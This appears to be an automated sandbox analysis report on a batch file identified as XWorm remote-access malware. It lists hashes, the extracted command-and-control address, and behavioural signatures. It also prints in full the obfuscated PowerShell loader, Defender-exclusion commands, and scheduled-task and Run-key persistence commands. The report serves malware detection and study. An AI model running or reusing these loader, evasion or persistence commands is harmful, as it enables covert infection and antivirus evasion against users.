Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 12:54
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240508-en
General
-
Target
XClient.bat
-
Size
306KB
-
MD5
5f114fbb47589f072b2329adeab0e2d7
-
SHA1
1572da87baa2fcd945be9ca5073cf2c27a5e4eda
-
SHA256
976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
-
SHA512
4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
-
SSDEEP
6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3600-49-0x0000025B485C0000-0x0000025B485DC000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 26 3600 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1704 powershell.exe 2240 powershell.exe 4876 powershell.exe 2740 powershell.exe 3280 powershell.exe 2144 powershell.exe 3600 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Runtime Broker.exepid process 1500 Runtime Broker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 25 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRuntime Broker.exepid process 3280 powershell.exe 3280 powershell.exe 2144 powershell.exe 2144 powershell.exe 3600 powershell.exe 3600 powershell.exe 4876 powershell.exe 4876 powershell.exe 2740 powershell.exe 2740 powershell.exe 1704 powershell.exe 1704 powershell.exe 1704 powershell.exe 2240 powershell.exe 2240 powershell.exe 2240 powershell.exe 3600 powershell.exe 1500 Runtime Broker.exe 1500 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3280 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeIncreaseQuotaPrivilege 2144 powershell.exe Token: SeSecurityPrivilege 2144 powershell.exe Token: SeTakeOwnershipPrivilege 2144 powershell.exe Token: SeLoadDriverPrivilege 2144 powershell.exe Token: SeSystemProfilePrivilege 2144 powershell.exe Token: SeSystemtimePrivilege 2144 powershell.exe Token: SeProfSingleProcessPrivilege 2144 powershell.exe Token: SeIncBasePriorityPrivilege 2144 powershell.exe Token: SeCreatePagefilePrivilege 2144 powershell.exe Token: SeBackupPrivilege 2144 powershell.exe Token: SeRestorePrivilege 2144 powershell.exe Token: SeShutdownPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeSystemEnvironmentPrivilege 2144 powershell.exe Token: SeRemoteShutdownPrivilege 2144 powershell.exe Token: SeUndockPrivilege 2144 powershell.exe Token: SeManageVolumePrivilege 2144 powershell.exe Token: 33 2144 powershell.exe Token: 34 2144 powershell.exe Token: 35 2144 powershell.exe Token: 36 2144 powershell.exe Token: SeIncreaseQuotaPrivilege 2144 powershell.exe Token: SeSecurityPrivilege 2144 powershell.exe Token: SeTakeOwnershipPrivilege 2144 powershell.exe Token: SeLoadDriverPrivilege 2144 powershell.exe Token: SeSystemProfilePrivilege 2144 powershell.exe Token: SeSystemtimePrivilege 2144 powershell.exe Token: SeProfSingleProcessPrivilege 2144 powershell.exe Token: SeIncBasePriorityPrivilege 2144 powershell.exe Token: SeCreatePagefilePrivilege 2144 powershell.exe Token: SeBackupPrivilege 2144 powershell.exe Token: SeRestorePrivilege 2144 powershell.exe Token: SeShutdownPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeSystemEnvironmentPrivilege 2144 powershell.exe Token: SeRemoteShutdownPrivilege 2144 powershell.exe Token: SeUndockPrivilege 2144 powershell.exe Token: SeManageVolumePrivilege 2144 powershell.exe Token: 33 2144 powershell.exe Token: 34 2144 powershell.exe Token: 35 2144 powershell.exe Token: 36 2144 powershell.exe Token: SeIncreaseQuotaPrivilege 2144 powershell.exe Token: SeSecurityPrivilege 2144 powershell.exe Token: SeTakeOwnershipPrivilege 2144 powershell.exe Token: SeLoadDriverPrivilege 2144 powershell.exe Token: SeSystemProfilePrivilege 2144 powershell.exe Token: SeSystemtimePrivilege 2144 powershell.exe Token: SeProfSingleProcessPrivilege 2144 powershell.exe Token: SeIncBasePriorityPrivilege 2144 powershell.exe Token: SeCreatePagefilePrivilege 2144 powershell.exe Token: SeBackupPrivilege 2144 powershell.exe Token: SeRestorePrivilege 2144 powershell.exe Token: SeShutdownPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeSystemEnvironmentPrivilege 2144 powershell.exe Token: SeRemoteShutdownPrivilege 2144 powershell.exe Token: SeUndockPrivilege 2144 powershell.exe Token: SeManageVolumePrivilege 2144 powershell.exe Token: 33 2144 powershell.exe Token: 34 2144 powershell.exe Token: 35 2144 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3600 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1948 wrote to memory of 3280 1948 cmd.exe powershell.exe PID 1948 wrote to memory of 3280 1948 cmd.exe powershell.exe PID 3280 wrote to memory of 2144 3280 powershell.exe powershell.exe PID 3280 wrote to memory of 2144 3280 powershell.exe powershell.exe PID 3280 wrote to memory of 3916 3280 powershell.exe WScript.exe PID 3280 wrote to memory of 3916 3280 powershell.exe WScript.exe PID 3916 wrote to memory of 2992 3916 WScript.exe cmd.exe PID 3916 wrote to memory of 2992 3916 WScript.exe cmd.exe PID 2992 wrote to memory of 3600 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 3600 2992 cmd.exe powershell.exe PID 3600 wrote to memory of 4876 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 4876 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 2740 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 2740 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 1704 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 1704 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 2240 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 2240 3600 powershell.exe powershell.exe PID 3600 wrote to memory of 1056 3600 powershell.exe schtasks.exe PID 3600 wrote to memory of 1056 3600 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_719_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_719.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_719.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_719.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_719.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_719.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2240
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:1056
-
-
-
-
-
-
C:\Users\Admin\Runtime Broker.exe"C:\Users\Admin\Runtime Broker.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1500
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5773440cd6eb4e778c7d2115d1f231f75
SHA14b600aa41fcd267817961c95b104a0717c40e558
SHA25664c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c
SHA512af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
306KB
MD55f114fbb47589f072b2329adeab0e2d7
SHA11572da87baa2fcd945be9ca5073cf2c27a5e4eda
SHA256976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
SHA5124ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
-
Filesize
115B
MD58b0a2da6bcaae65ccc5ffeef7b50a4f2
SHA14682adff8caac8e83fd3273f498bd2bc5748560d
SHA25686887705b83ea4206446cb198af1b9dbf8e2c3fbd5402232b648d95f32b9bfbd
SHA512e0c80d6c94c9809f3c2db416b63aed7e5f292c3166441a242a183dbb165323a68b72437de268f56f3747ddfa2b73472e39441197196632920b287f8a6006c06e
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b